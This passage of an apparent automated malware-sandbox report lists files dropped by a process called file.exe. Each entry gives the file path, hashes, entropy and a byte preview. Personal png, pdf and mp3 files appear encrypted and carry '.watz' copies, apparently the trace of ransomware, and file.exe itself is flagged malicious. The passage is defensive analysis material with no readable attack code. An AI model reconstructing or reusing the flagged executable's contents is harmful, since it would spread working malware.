Preview:	YPSIA.j...'.....pTQ$...../..<G.....`V....8...8.}.>..3....}t....."[t^.6..mw.d.n....V...0U....%MI..R.B.....D4W.;..8b....%7.....%..{..........+.......^...9...f&.q...=j.{F...K.O.j...eT^....f..... .dko..XS..W.G}...<..2.ge&/.Vh./!N.Nf.O.F.>......W.P$...;.7MS...(.%. y9k.d ..C:....,.....e...6U;..J.d.N...6q:/k..mO.5.....s,.d7)...%..[........H....a.....Z......1.6...."..........N.o..={..sE."[ha.m.h.}..8.5.......,.......4.....^......0..$...Y..O1Q.....3..#.=.p..yP..(Z....<.+KsPR..L.uCl#j..MB..h....\..9.%5...\|...j/.].O.QWi...C.e;..-.i]g..E.. ..\....<..j.Nk.y...k_%.......\...Z....4..W...2 ..(.)RU..\^:.v..v.y<..e8=....j....5{-..b..8[.TQ.0.)..K...i5.=.\.C...j..=0.....~..].Bfx.Z!.Sd#.8+ ..F.....B...3.....0p.o..L..E..wU.so..e{....R~.....f.p....d.v.!gB...9......Rg..dH..Z.Fr.3Y}..'..@.L...{..W3U..K.V..M......c...\|.9Rs-,3\./.....w...M{. ..\|.X..\|.!-...`M./S..!..<.8..x.d.....hn+.b.T.f.r.Pu.K....X.7...1.....].B}R...3....8.....f.....!Hf.~(..R.

C:\Users\user\Desktop\VLZDGUKUTZ\YPSIACHYXW.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8555784197525576
Encrypted:	false
SSDEEP:	24:PXljtPTkZmSDlx5tk719lYBdmtA5mm2QTs693dkGgJlbD:vljtSmS5x5tk3lqhg4939gzD
MD5:	57F785A069D371EEAF234D7F341DCFA0
SHA1:	B22B49D412DE72168ED3596B7BE5C6C1F6C452D8
SHA-256:	E6E4D7635309EA35F376211EB5D6D6D254EE2B183A5213CA0DA29F7F1B93ACE9
SHA-512:	D500440EE036AF08E7E4490EE231E07D5E0F178458325D426F90259B68DE92C555C953817A8A3BD5BD1AD1A54FB7F020DD582C0C44CA405805CEAAF67CCCE18A
Malicious:	false
Preview:	YPSIA.j...'.....pTQ$...../..<G.....`V....8...8.}.>..3....}t....."[t^.6..mw.d.n....V...0U....%MI..R.B.....D4W.;..8b....%7.....%..{..........+.......^...9...f&.q...=j.{F...K.O.j...eT^....f..... .dko..XS..W.G}...<..2.ge&/.Vh./!N.Nf.O.F.>......W.P$...;.7MS...(.%. y9k.d ..C:....,.....e...6U;..J.d.N...6q:/k..mO.5.....s,.d7)...%..[........H....a.....Z......1.6...."..........N.o..={..sE."[ha.m.h.}..8.5.......,.......4.....^......0..$...Y..O1Q.....3..#.=.p..yP..(Z....<.+KsPR..L.uCl#j..MB..h....\..9.%5...\|...j/.].O.QWi...C.e;..-.i]g..E.. ..\....<..j.Nk.y...k_%.......\...Z....4..W...2 ..(.)RU..\^:.v..v.y<..e8=....j....5{-..b..8[.TQ.0.)..K...i5.=.\.C...j..=0.....~..].Bfx.Z!.Sd#.8+ ..F.....B...3.....0p.o..L..E..wU.so..e{....R~.....f.p....d.v.!gB...9......Rg..dH..Z.Fr.3Y}..'..@.L...{..W3U..K.V..M......c...\|.9Rs-,3\./.....w...M{. ..\|.X..\|.!-...`M./S..!..<.8..x.d.....hn+.b.T.f.r.Pu.K....X.7...1.....].B}R...3....8.....f.....!Hf.~(..R.

C:\Users\user\Desktop\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859376351661271
Encrypted:	false
SSDEEP:	24:9qqaqwvk8Wga9mvGBhWUPd5nZkOXpXjUnO89XRhXAyLrWzM2zRz5bD:vavk8da0vQNdjkOXpXjUnOiXTzmQ2zRx
MD5:	1CA068494F27477533B8960402AFFD53
SHA1:	9265962714FCAAF14A0D842945F766543772737D
SHA-256:	6AE179F017A4DD89D77FB4309D4CC306A353ADEAF42A3AA8296742ACA26CE1E0
SHA-512:	908FA08A1957313206DB1D0CDA8E8C25E949FC9993BECA94BEAB9AA3726B0C67262358AFC4A05F64B66253977AB7ACE612048F12EB2AE0085E8CB5B69CF82843
Malicious:	false
Preview:	WUTJS...n.<;..j..B.1'.?Hu&kv...0..s.O..).Pw.(.A..xJ.T.pk.WT..h.....5.Rt.j.kLm=..2.3.m(.v........Mqxb..Z)..7_6.8.=.p.iLr:.C`.ho._b0.....i"n.M....6....[.St.,'...v/.PAbR...C..%6...O.T.5..7.\|.@.....N...&.U...,.x..8$.A...+.bKc......e.".I.l=.6...75.D.C.q...."./.)9.....}y.V..z....F.K..aw..R...."....<...K.an.x.e..n.?Q.....TH}.'..X=...f...z..L....8[.h.I.MZAQ..7i....ta/..<......".O2.w-....Hq...&l.Bz.%...FZ.,G.+p...>'....".!..y9...C.F..N.=.[~..5.[.L....U......dH...]......1e...U..zE..$8.....wg'.$.H.y#[l.).~r. r.F.....$It...........[@zgN..b.g.5.........;.......v..V.z./x?.7.!uc......e.....%.......E..\|..8J;......N.m..B.W.G.(.t?3.9....x...i..&.}. !D.%..-9.n.f.d.Ud.2.B..E.?y...aP.F.........T!...&_\.R..;...rU.9.`('...0..6...Y..8.HH...5..QX2.0.X....No5N..B..r......F..A.$.......;G.....58........k....@e.. P.......2P.m].;.=.,:.EJuA2r..N2..U......u........4.fC.....P.......+f.ZCv}.....tf....5....e.n`......./.HC..o.)......Cw\...r.o..O...`W..eA....}x.Iy."._....P...m@..

C:\Users\user\Desktop\WUTJSCBCFX.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859376351661271
Encrypted:	false
SSDEEP:	24:9qqaqwvk8Wga9mvGBhWUPd5nZkOXpXjUnO89XRhXAyLrWzM2zRz5bD:vavk8da0vQNdjkOXpXjUnOiXTzmQ2zRx
MD5:	1CA068494F27477533B8960402AFFD53
SHA1:	9265962714FCAAF14A0D842945F766543772737D
SHA-256:	6AE179F017A4DD89D77FB4309D4CC306A353ADEAF42A3AA8296742ACA26CE1E0
SHA-512:	908FA08A1957313206DB1D0CDA8E8C25E949FC9993BECA94BEAB9AA3726B0C67262358AFC4A05F64B66253977AB7ACE612048F12EB2AE0085E8CB5B69CF82843
Malicious:	false
Preview:	WUTJS...n.<;..j..B.1'.?Hu&kv...0..s.O..).Pw.(.A..xJ.T.pk.WT..h.....5.Rt.j.kLm=..2.3.m(.v........Mqxb..Z)..7_6.8.=.p.iLr:.C`.ho._b0.....i"n.M....6....[.St.,'...v/.PAbR...C..%6...O.T.5..7.\|.@.....N...&.U...,.x..8$.A...+.bKc......e.".I.l=.6...75.D.C.q...."./.)9.....}y.V..z....F.K..aw..R...."....<...K.an.x.e..n.?Q.....TH}.'..X=...f...z..L....8[.h.I.MZAQ..7i....ta/..<......".O2.w-....Hq...&l.Bz.%...FZ.,G.+p...>'....".!..y9...C.F..N.=.[~..5.[.L....U......dH...]......1e...U..zE..$8.....wg'.$.H.y#[l.).~r. r.F.....$It...........[@zgN..b.g.5.........;.......v..V.z./x?.7.!uc......e.....%.......E..\|..8J;......N.m..B.W.G.(.t?3.9....x...i..&.}. !D.%..-9.n.f.d.Ud.2.B..E.?y...aP.F.........T!...&_\.R..;...rU.9.`('...0..6...Y..8.HH...5..QX2.0.X....No5N..B..r......F..A.$.......;G.....58........k....@e.. P.......2P.m].;.=.,:.EJuA2r..N2..U......u........4.fC.....P.......+f.ZCv}.....tf....5....e.n`......./.HC..o.)......Cw\...r.o..O...`W..eA....}x.Iy."._....P...m@..

C:\Users\user\Desktop\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861861298357318
Encrypted:	false
SSDEEP:	24:XMx9QsDTxPlqWi3nf9rXMSXzooSIlNfHHabnCr+2k5qHtPQnCoWQZOxoai9se3xD:crQUxPl+FrXMSXcoSIlpHa7C6mPQnCod
MD5:	93CBA38AFB1017F8E60BB2D3525C8338
SHA1:	5F8B7912C37E8B582E33CEE156397E1845542813
SHA-256:	7D0DB70AC0C009C9CDB84D85B66EED7A8E355954C819C0C536561C6C408AA871
SHA-512:	19D146BF1F1EA02A1028E1C195CF73D0F7D08D048A7F418794E53E04C3E67AE2A90F070EE7AC35B255210DD980AF09E3D61B4582BAC4F27047418E38D4CAD16D
Malicious:	false
Preview:	YPSIA4..GW1=5..}...8+ ...WRb_@..y{.-.u;.....i.........V._.D.(+.";...A..?.......[.......493..t.......z........[.J..].........)N.BW..`M...@.(..d'.y\...?..............E...e....s#.pi......g..."..^...W.l.....Z.?f..E....e.?d,..7eF....#.5W......p9.ib't../.h.D.m.../.xT.....q.P..b(O...z\...:.EG`.?}..% .....d..P.$N.......6....V<.%.......k.a.z...3....q...z..\|.^.C..~...!.8..{Gs0..[T/Yn....C%......Ok......=o..msW.1.#..J...e.....jF%....Je..g..].X.+....8......0h@\.>..I..e..@..H.. ...z.+.u.......2.?..<~.A.#.?.\.F.4.q.. ..c..x..J.U...5w.P`.....(H...QEa.;yH....!.@...d.......`.AY..hQ.,...........ZP.%...T5.B..X...r.W......0.wF..I......F:2.....9@.....\|,....U.......q.6..N...0....,.....c.B...K..0...?.G.l.!../.7._...#..2]e..7....J.F...!?.%.....M%...aX..i1.XQ.....'}...%.qZ..%.#.....&X....C.kh.4.RN=..,....1.P..w....n..;.S.\u..vp..!..x&.R.~{y.C?...'...&...P9..t..A.(....;....bn)y.7>>..eoJS.....Q.1).......U....y..g..l4J.G...:..^Im.;26NU,.G.EVX....a".a%\....s{...d.;p*..I.)

C:\Users\user\Desktop\YPSIACHYXW.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861861298357318
Encrypted:	false
SSDEEP:	24:XMx9QsDTxPlqWi3nf9rXMSXzooSIlNfHHabnCr+2k5qHtPQnCoWQZOxoai9se3xD:crQUxPl+FrXMSXcoSIlpHa7C6mPQnCod
MD5:	93CBA38AFB1017F8E60BB2D3525C8338
SHA1:	5F8B7912C37E8B582E33CEE156397E1845542813
SHA-256:	7D0DB70AC0C009C9CDB84D85B66EED7A8E355954C819C0C536561C6C408AA871
SHA-512:	19D146BF1F1EA02A1028E1C195CF73D0F7D08D048A7F418794E53E04C3E67AE2A90F070EE7AC35B255210DD980AF09E3D61B4582BAC4F27047418E38D4CAD16D
Malicious:	false
Preview:	YPSIA4..GW1=5..}...8+ ...WRb_@..y{.-.u;.....i.........V._.D.(+.";...A..?.......[.......493..t.......z........[.J..].........)N.BW..`M...@.(..d'.y\...?..............E...e....s#.pi......g..."..^...W.l.....Z.?f..E....e.?d,..7eF....#.5W......p9.ib't../.h.D.m.../.xT.....q.P..b(O...z\...:.EG`.?}..% .....d..P.$N.......6....V<.%.......k.a.z...3....q...z..\|.^.C..~...!.8..{Gs0..[T/Yn....C%......Ok......=o..msW.1.#..J...e.....jF%....Je..g..].X.+....8......0h@\.>..I..e..@..H.. ...z.+.u.......2.?..<~.A.#.?.\.F.4.q.. ..c..x..J.U...5w.P`.....(H...QEa.;yH....!.@...d.......`.AY..hQ.,...........ZP.%...T5.B..X...r.W......0.wF..I......F:2.....9@.....\|,....U.......q.6..N...0....,.....c.B...K..0...?.G.l.!../.7._...#..2]e..7....J.F...!?.%.....M%...aX..i1.XQ.....'}...%.qZ..%.#.....&X....C.kh.4.RN=..,....1.P..w....n..;.S.\u..vp..!..x&.R.~{y.C?...'...&...P9..t..A.(....;....bn)y.7>>..eoJS.....Q.1).......U....y..g..l4J.G...:..^Im.;26NU,.G.EVX....a".a%\....s{...d.;p*..I.)

C:\Users\user\Desktop\file.exe

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	746830
Entropy (8bit):	7.904347284232954
Encrypted:	false
SSDEEP:	12288:a6YevJ2e+NVNoDTyC9yR+xBP4wMpAuhjH8/Hl19KKjNgzqE0CM6EpJMwkM:zYeYe+N0TX9Xj4w+hbM1/g2kM3
MD5:	4D82F87310CA4DB6CF999E6A8F34EBEA
SHA1:	4DC30E509D949FBC54425D1BE2B54EE790BBE80D
SHA-256:	DE1E7ECE1A2958170E18F42F72FFC9694BDD6BA2F69B0F6192D612C7BE158B69
SHA-512:	EEB1BD2A1E074F2C13F34DA67BCD17296E040811BB31553C8C2F64AD1EE5DE36D67B40DADCF1CB9FECCFA8B6EDEB187173B10AEC95CEC25851B66F24A4240061
Malicious:	true
Preview:	MZ.....NEv.........eo&E....]..f'.X......R.,O+...H..w..e.r9D.bO..3}...]lZ&.g.....hA.d;..k.05.8...s..A.(q.....P_DRU;.U)...9.0..L.w\|....3..7.......$xc.2g...v....hL.\...)..x ...ao..!u..V.a.....'7.4..;..&)\.-.o..<.\|.5'n...Z.C`.?(F.....x]...70z.\}\|Ne....~%..IA.B..p.....A.P.........,...]..n.0....Th.......@3...P8..[$n0.t.....0v.........1........>..SFH.A.......&..o&3x..Q..?.........\|.;vF..+..u........k.C.\...pX...c.Z... ..I.Rv.q.YO.t.].QmES=..k..qW..%..J>X.\|r.............HSW.D..5~.B]..-,..A.....C=.uL0..PZ(&.9.{z.9..r.'.....j......?-.T.\|.,.W..%.>.{.J..e..k%.^]\I.=N..1L.9n.q..s..[O8.>........{..p..Vz..8o.ZS...<...f.l{....Z....%%..........o.}..#.t.......h.P8.....M.@Gz..d..rA..c..7..8[4.5T......x....$.g.......g@.<..?F...{:.te...XO.p.?...!....m..HE...\.@oM$-.."s..tk...!#.....@.`xKp......d<......A....yN....Q..,....~[Wt ..q.K.MJ..B.[ }..K..:u9.pd....f..k&.m.D...<........l........V..86.1.b.....`..V.)E...-H....>..!.l...EW.UcV9A.t........@.I[-.D.?..R..^

C:\Users\user\Desktop\file.exe.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	746830
Entropy (8bit):	7.904347284232954
Encrypted:	false
SSDEEP:	12288:a6YevJ2e+NVNoDTyC9yR+xBP4wMpAuhjH8/Hl19KKjNgzqE0CM6EpJMwkM:zYeYe+N0TX9Xj4w+hbM1/g2kM3
MD5:	4D82F87310CA4DB6CF999E6A8F34EBEA
SHA1:	4DC30E509D949FBC54425D1BE2B54EE790BBE80D
SHA-256:	DE1E7ECE1A2958170E18F42F72FFC9694BDD6BA2F69B0F6192D612C7BE158B69
SHA-512:	EEB1BD2A1E074F2C13F34DA67BCD17296E040811BB31553C8C2F64AD1EE5DE36D67B40DADCF1CB9FECCFA8B6EDEB187173B10AEC95CEC25851B66F24A4240061
Malicious:	true
Preview:	MZ.....NEv.........eo&E....]..f'.X......R.,O+...H..w..e.r9D.bO..3}...]lZ&.g.....hA.d;..k.05.8...s..A.(q.....P_DRU;.U)...9.0..L.w\|....3..7.......$xc.2g...v....hL.\...)..x ...ao..!u..V.a.....'7.4..;..&)\.-.o..<.\|.5'n...Z.C`.?(F.....x]...70z.\}\|Ne....~%..IA.B..p.....A.P.........,...]..n.0....Th.......@3...P8..[$n0.t.....0v.........1........>..SFH.A.......&..o&3x..Q..?.........\|.;vF..+..u........k.C.\...pX...c.Z... ..I.Rv.q.YO.t.].QmES=..k..qW..%..J>X.\|r.............HSW.D..5~.B]..-,..A.....C=.uL0..PZ(&.9.{z.9..r.'.....j......?-.T.\|.,.W..%.>.{.J..e..k%.^]\I.=N..1L.9n.q..s..[O8.>........{..p..Vz..8o.ZS...<...f.l{....Z....%%..........o.}..#.t.......h.P8.....M.@Gz..d..rA..c..7..8[4.5T......x....$.g.......g@.<..?F...{:.te...XO.p.?...!....m..HE...\.@oM$-.."s..tk...!#.....@.`xKp......d<......A....yN....Q..,....~[Wt ..q.K.MJ..B.[ }..K..:u9.pd....f..k&.m.D...<........l........V..86.1.b.....`..V.)E...-H....>..!.l...EW.UcV9A.t........@.I[-.D.?..R..^

C:\Users\user\Documents\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854393188145099
Encrypted:	false
SSDEEP:	24:NLPLO22TmlT0LeqDlL2qBKi7hK0UW2k+DLgf0I0IB1w05/06fL74/r5sYHbD:ZPLO224o9L2qb7hTUWj8LOx0Inw057f6
MD5:	4613D175BB7ACCC921F5FFCD042C7B75
SHA1:	C99C9FBF36AA3CC814A2142208CD844DEA5176CB
SHA-256:	5AE341297CA7E2F2126ABA25DF73FB229DF13867053FDAAAD60AAEB217429DC5
SHA-512:	E6A14D69216189B6EDBD04C743322693402900C3E7EB7F80EF979252FF4E1B13BCC6F0625BFB8A856F2E7795ADD2595D8E69B0773977E17FD10B5D89667167D4
Malicious:	false
Preview:	BPMLNT.HQ/n@.Nt.m....T....w....!/<....h.4W.(...\.0\|.........e^D.l.:3ZGX..y..3...W._...g.&....\|.....KPE.e..o..^`\|{....3...M...3e.....Nn....Y&....p.......x@u. <.@=C;.C.f.X.Uu.,...0....ku..S1.n....w..S.0..;hh..D....r...0....~e~c.Q..'o.A.y......m....{`.:.]...<.%.[.H............`.Es.yP.....R.....Y.......7{./.!?^..8~....U...U............{.%..A.Up.Y.".... ...W}h.=k+[.....%..T..<6....1l%..j..>.?...`....\...L....A.._.<P0.4...R,s[B.@...f@4.7....R.f....R"9@.......s.b..z.R.fp.\|..?....![e4....]G..K...gB.........8.`.3.R.F......v....G.U.?.u.E....:..W.6k.%....q...V).o..4".#.?.........U.(e.{...w.ir3.Qa.gQ.5..Z...2.K?..{....p4}i_,R.~......s}..P+.U.<.7p.....L.=^........c...R.'....Z.o.6.-.@.l..o.*.$.-.{u. u..h.z.sh}...iXu.-].S.......O.2....A.<.l..8/b;r......v..x..O....- .....S.....'.#.1~.......'.n.kk1.a\|....w)...R.Ok_.CA.z.........t.../.....^..L+...hkh....0.\.@.....y...Co...t..>C6)E.2...L.......N.gw......H.......:w..A.$.!YkI.y..)~.._m..>..\...:".e..a;...

C:\Users\user\Documents\BPMLNOBVSB.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854393188145099
Encrypted:	false
SSDEEP:	24:NLPLO22TmlT0LeqDlL2qBKi7hK0UW2k+DLgf0I0IB1w05/06fL74/r5sYHbD:ZPLO224o9L2qb7hTUWj8LOx0Inw057f6
MD5:	4613D175BB7ACCC921F5FFCD042C7B75
SHA1:	C99C9FBF36AA3CC814A2142208CD844DEA5176CB
SHA-256:	5AE341297CA7E2F2126ABA25DF73FB229DF13867053FDAAAD60AAEB217429DC5
SHA-512:	E6A14D69216189B6EDBD04C743322693402900C3E7EB7F80EF979252FF4E1B13BCC6F0625BFB8A856F2E7795ADD2595D8E69B0773977E17FD10B5D89667167D4
Malicious:	false
Preview:	BPMLNT.HQ/n@.Nt.m....T....w....!/<....h.4W.(...\.0\|.........e^D.l.:3ZGX..y..3...W._...g.&....\|.....KPE.e..o..^`\|{....3...M...3e.....Nn....Y&....p.......x@u. <.@=C;.C.f.X.Uu.,...0....ku..S1.n....w..S.0..;hh..D....r...0....~e~c.Q..'o.A.y......m....{`.:.]...<.%.[.H............`.Es.yP.....R.....Y.......7{./.!?^..8~....U...U............{.%..A.Up.Y.".... ...W}h.=k+[.....%..T..<6....1l%..j..>.?...`....\...L....A.._.<P0.4...R,s[B.@...f@4.7....R.f....R"9@.......s.b..z.R.fp.\|..?....![e4....]G..K...gB.........8.`.3.R.F......v....G.U.?.u.E....:..W.6k.%....q...V).o..4".#.?.........U.(e.{...w.ir3.Qa.gQ.5..Z...2.K?..{....p4}i_,R.~......s}..P+.U.<.7p.....L.=^........c...R.'....Z.o.6.-.@.l..o.*.$.-.{u. u..h.z.sh}...iXu.-].S.......O.2....A.<.l..8/b;r......v..x..O....- .....S.....'.#.1~.......'.n.kk1.a\|....w)...R.Ok_.CA.z.........t.../.....^..L+...hkh....0.\.@.....y...Co...t..>C6)E.2...L.......N.gw......H.......:w..A.$.!YkI.y..)~.._m..>..\...:".e..a;...

C:\Users\user\Documents\CURQNKVOIX.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846929026955469
Encrypted:	false
SSDEEP:	24:mnJDdWA0Hc89AGlDOXWAn2l1dWfB+6wd/8+5mTFVmTV+vIkHVNgFstp868ujWcsZ:qNoA089aOFLE0+UTFoV+vjHPZa68uj+T
MD5:	092D5F983900D2868BD59BF65160927A
SHA1:	D21C47C237CD7B7B05E34FB7410EC192E9CA3E83
SHA-256:	E51CED2167BF150FD655E8F9C54ABA7C03ECBE4BF2CCDD50FEFED38114370A27
SHA-512:	62AF6A4949BCC89E4FCC748C795959A135F3D9FE70EBDDC85422515F9323018CEE33CE8755989A4D0493D12366EF5C70FB1D807E3AC73269BFF1DE991E21B7D9
Malicious:	false
Preview:	CURQN..<..B.mLl4..E......m..6.,&...T.;V.!.... +.c.].B.5+:...C~...^.}.;.fb(Z}yn..d2%...C.M.>...s'M0..$...i@v%......._...^...!v..+...'..p..Xe.Y.N..E'7 \.P18.....2.%..{.F.^......c.......1....V.f4.G.o.$.}U.my%...........6..B.U...>...D%...D<.S\...!..>......`.S.G...T.c%..?>s.....hZy.5...r..cB..jM.<K.@I.6..H.7F.Q.(d\|.t.~...P.$......qLeMk...k^..T....o..?9d..v1...D"+._..pD....-.N~..%.3..H.........m..~.h)...'#..`.>..............%b..........m.t.g.S.BG.Xp8a.g.F.`?.Y.....W...T.Q.8.s.$...$1./~."5.+.b.....W\..z8.s....{.N....KQ.....y...Y.a...GE.[]=.%.a.j..N>.ULu.\GD..hF.".......E.5...f~.d:KWj......m.{...n.op.6..1.".k.7N[.......f4.yRv.ncz...\|...zV.....r..u&..o....8...Fx.w.!....v.J_%.....(..wb5..;......9.I.(..L....l3.]N....7...W....s..Z.'...E...?\|u..>....."..0=...)dnoI..3Ha........1vy%.k.8{.../w.RxD......g'C..F.....^....9.^.t&[F..`E...r.v}.?..Y.. ,..z..P]..5..UDM....q&.).Z...c....O....d0.0..i.DC.(...9...8.d7...*...O9....5.......W.w7.E...(

C:\Users\user\Documents\CURQNKVOIX.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846929026955469
Encrypted:	false
SSDEEP:	24:mnJDdWA0Hc89AGlDOXWAn2l1dWfB+6wd/8+5mTFVmTV+vIkHVNgFstp868ujWcsZ:qNoA089aOFLE0+UTFoV+vjHPZa68uj+T
MD5:	092D5F983900D2868BD59BF65160927A
SHA1:	D21C47C237CD7B7B05E34FB7410EC192E9CA3E83
SHA-256:	E51CED2167BF150FD655E8F9C54ABA7C03ECBE4BF2CCDD50FEFED38114370A27
SHA-512:	62AF6A4949BCC89E4FCC748C795959A135F3D9FE70EBDDC85422515F9323018CEE33CE8755989A4D0493D12366EF5C70FB1D807E3AC73269BFF1DE991E21B7D9
Malicious:	false
Preview:	CURQN..<..B.mLl4..E......m..6.,&...T.;V.!.... +.c.].B.5+:...C~...^.}.;.fb(Z}yn..d2%...C.M.>...s'M0..$...i@v%......._...^...!v..+...'..p..Xe.Y.N..E'7 \.P18.....2.%..{.F.^......c.......1....V.f4.G.o.$.}U.my%...........6..B.U...>...D%...D<.S\...!..>......`.S.G...T.c%..?>s.....hZy.5...r..cB..jM.<K.@I.6..H.7F.Q.(d\|.t.~...P.$......qLeMk...k^..T....o..?9d..v1...D"+._..pD....-.N~..%.3..H.........m..~.h)...'#..`.>..............%b..........m.t.g.S.BG.Xp8a.g.F.`?.Y.....W...T.Q.8.s.$...$1./~."5.+.b.....W\..z8.s....{.N....KQ.....y...Y.a...GE.[]=.%.a.j..N>.ULu.\GD..hF.".......E.5...f~.d:KWj......m.{...n.op.6..1.".k.7N[.......f4.yRv.ncz...\|...zV.....r..u&..o....8...Fx.w.!....v.J_%.....(..wb5..;......9.I.(..L....l3.]N....7...W....s..Z.'...E...?\|u..>....."..0=...)dnoI..3Ha........1vy%.k.8{.../w.RxD......g'C..F.....^....9.^.t&[F..`E...r.v}.?..Y.. ,..z..P]..5..UDM....q&.).Z...c....O....d0.0..i.DC.(...9...8.d7...*...O9....5.......W.w7.E...(

C:\Users\user\Documents\DVWHKMNFNN.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858974598451403
Encrypted:	false
SSDEEP:	24:mU4dOMojTKyZ0w7XXV3h04PWEG/FLMzUmcoLaTx8azXFGVxKBI7bjbD:bZpfD0w75hR2/Fw+Y8FQbbD
MD5:	DF2F3B3449398704D3BAC0ED3067E369
SHA1:	2A59A90D72AEAC68D07DB69A0CCA23CC6CDD90B4
SHA-256:	C86F679F59914D5ACB183E9E41D4FC728635C5A8F9168057FAA0E14DE8AAAF6B
SHA-512:	B1849E61E8719669A1D7923E17024BB686D44E458A2DF88C6427ECBCAE32E2E27DBF9B3C6A3449D3BFF64896B3633D943070C58B77E7E6EDCAF11EB217C6F5AE
Malicious:	false
Preview:	DVWHK.E>>.%.<......@F.5A..7..hI[E..Q..xk....q\|N...PiDWk[..c....[.VU.D...,.....Q.Si.>Xnq(2\h8....pC........D.n;PL.A...0..._.kR>.w..<.O.M.~.n...!>..tOeu.~?cX.YU..aM..m.'...Q.....R....Tn.d4.Hw'D...;.....Lj..".vY8...l.2o.. I...@.........o.$..x..D.f4"..%.E....=...m..l....^.7...N,..S[.E..y.s6#.........$.Nk........W.ec....)T...Y+..r..'C..:.....\|\|jN.....=(..m..].\6...D..+!.x....}.N?.=....q%..G.v.b4:...Kc.q.L....2..8...^. .d?......g.jL.)..Y.$A.n.....3_AaA...6.C..M,..6.]f.9./...KVQ.......Yx....".9....a..%..=Sp.#..g~..-..<....Fs..D.\~...p0...F.>..R.N..o.>.../..._..>.P.>.....Z}O.....f.h..j1.C.o.=....`....S...?.%.....M....9...(..C"QH.7.........I.K...#...}..Di4&...5...X.e,.u.(..C..=Y.iF)......h(......I\|.....[^/v...o.D.......]"T..Jb].CC...~..~+.!Z.a.v.b..v..%.8t..M2.Z.dq..'.Z.bn..U..J..#R..).........5.s.d......5...FC..y.X0...n.q...1p .\|...U..t.Sh...U..d.&........J.o...V....._.....h@.].DiV....rM."J_....Y".k.s...q......S....>......4......;.w.e.8J..;

C:\Users\user\Documents\DVWHKMNFNN.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858974598451403
Encrypted:	false
SSDEEP:	24:mU4dOMojTKyZ0w7XXV3h04PWEG/FLMzUmcoLaTx8azXFGVxKBI7bjbD:bZpfD0w75hR2/Fw+Y8FQbbD
MD5:	DF2F3B3449398704D3BAC0ED3067E369
SHA1:	2A59A90D72AEAC68D07DB69A0CCA23CC6CDD90B4
SHA-256:	C86F679F59914D5ACB183E9E41D4FC728635C5A8F9168057FAA0E14DE8AAAF6B
SHA-512:	B1849E61E8719669A1D7923E17024BB686D44E458A2DF88C6427ECBCAE32E2E27DBF9B3C6A3449D3BFF64896B3633D943070C58B77E7E6EDCAF11EB217C6F5AE
Malicious:	false
Preview:	DVWHK.E>>.%.<......@F.5A..7..hI[E..Q..xk....q\|N...PiDWk[..c....[.VU.D...,.....Q.Si.>Xnq(2\h8....pC........D.n;PL.A...0..._.kR>.w..<.O.M.~.n...!>..tOeu.~?cX.YU..aM..m.'...Q.....R....Tn.d4.Hw'D...;.....Lj..".vY8...l.2o.. I...@.........o.$..x..D.f4"..%.E....=...m..l....^.7...N,..S[.E..y.s6#.........$.Nk........W.ec....)T...Y+..r..'C..:.....\|\|jN.....=(..m..].\6...D..+!.x....}.N?.=....q%..G.v.b4:...Kc.q.L....2..8...^. .d?......g.jL.)..Y.$A.n.....3_AaA...6.C..M,..6.]f.9./...KVQ.......Yx....".9....a..%..=Sp.#..g~..-..<....Fs..D.\~...p0...F.>..R.N..o.>.../..._..>.P.>.....Z}O.....f.h..j1.C.o.=....`....S...?.%.....M....9...(..C"QH.7.........I.K...#...}..Di4&...5...X.e,.u.(..C..=Y.iF)......h(......I\|.....[^/v...o.D.......]"T..Jb].CC...~..~+.!Z.a.v.b..v..%.8t..M2.Z.dq..'.Z.bn..U..J..#R..).........5.s.d......5...FC..y.X0...n.q...1p .\|...U..t.Sh...U..d.&........J.o...V....._.....h@.].DiV....rM."J_....Y".k.s...q......S....>......4......;.w.e.8J..;

C:\Users\user\Documents\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851997726217784
Encrypted:	false
